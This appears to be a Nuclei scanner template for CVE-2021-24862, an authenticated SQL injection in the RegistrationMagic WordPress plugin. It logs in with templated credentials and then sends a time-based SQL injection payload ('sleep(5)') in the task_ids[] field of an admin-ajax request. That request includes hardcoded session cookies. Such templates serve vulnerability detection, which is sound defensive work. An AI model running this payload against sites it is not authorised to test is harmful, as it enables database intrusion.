CVE-2021-24862.yaml

id: CVE-2021-24862

info:
  name: RegistrationMagic < 5.0.1.6 - Admin+ SQL Injection
  author: cckuailong
  severity: medium
  description: The RegistrationMagic WordPress plugin before 5.0.1.6 does not escape user input in its rm_chronos_ajax AJAX action before using it in a SQL statement when duplicating tasks in batches, which could lead to a SQL injection issue.
  reference:
    - https://wpscan.com/vulnerability/7d3af3b5-5548-419d-aa32-1f7b51622615
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24862
  tags: wordpress,wp-plugin
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2021-24862
    cwe-id: CWE-89

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
        
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Cookie: wordpress_86a9106ae65537651a8e456835b316ab=wordpress%7C1643601067%7CRbyQr7ml3sNWTrxSP8oTm6XQ6HIrv7HLtuxx6aUxvd2%7Cf267d072b65fc327178a00cd862b90541ff13ad7db920613aff42ffedcd9b7d5; PHPSESSID=f84d63f64bf0dfdc810c0b679f570ac6; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=wordpress%7C1643601067%7CRbyQr7ml3sNWTrxSP8oTm6XQ6HIrv7HLtuxx6aUxvd2%7Ca084307b9f1b479b7463457efef0094f3b87831ca65ffbdd8e4d0c2bf20dcd64

        action=rm_chronos_ajax&rm_chronos_ajax_action=duplicate_tasks_batch&task_ids[]=1+and+sleep(5))--+- 

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'